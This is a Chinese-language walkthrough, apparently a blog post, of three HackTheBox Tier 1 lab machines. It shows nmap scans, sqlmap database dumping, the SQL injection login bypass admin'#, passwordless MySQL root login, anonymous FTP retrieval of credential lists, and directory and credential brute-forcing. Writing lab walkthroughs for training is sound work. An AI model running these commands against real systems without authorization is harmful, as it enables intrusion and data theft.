当我们深入学习HackTheBox靶场关卡时,TIER1关卡是我们接下来要探讨的重点。通过直播,我们已经详细解释了TIER0,现在我们将专注于TIER1的关卡。
Appointment
这个关卡主要涉及到SQL注入相关的知识。我们首先执行端口扫描:
nmap -T4 -A 10.129.23.47
扫描结果显示只有80端口开放,很明显这是一个Web站点。访问该IP:
既然存在SQL注入,我们使用Burp进行抓包,将数据放到SQLmap中进行扫描:
- 将数据包保存为txt文件。
- 执行以下命令:
sqlmap -r “22.txt” –dbs
成功获取数据库信息。接下来,我们可以获取表信息和字段信息:
sqlmap -r “22.txt” -D appdb –tables sqlmap -r “22.txt” -D appdb -T users –columns
当然,除了使用SQLmap,还有更简单的方法,直接使用通用账号进行登录,如admin’#
Sequle
同样,我们选定设备进行端口扫描:
nmap -sC -sV 10.129.95.232
结果显示目标开启了3306 MySQL端口。既然目标使用了MySQL相关端口,我们可以尝试暴力破解或匿名登录:
mysql -h 10.129.95.232 -u root -p
成功登录后,执行以下命令:
show databases; #显示数据库 use htb; #选择数据库 show tables; #显示表 select * from config; #查询表
成功获取flag。
Crocodile
同样,启动靶场后我们对目标进行端口扫描:
nmap -sC -sV 10.129.104.219
结果显示目标开启了21和80端口。并且21端口可以匿名登录。我们首先登录ftp来查看:
ftp 10.129.104.219 get allowed.userlist # 用户列表 get allowed.userlist.passwd # 密码列表
两个文件似乎存放了账号和密码。然后我们访问80端口:
dirb http://10.129.104.219 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -X .php
使用下载后的账号和密码进行登录。这里我使用Burp抓包后进行枚举破解。
成功获取flag。
暂无评论内容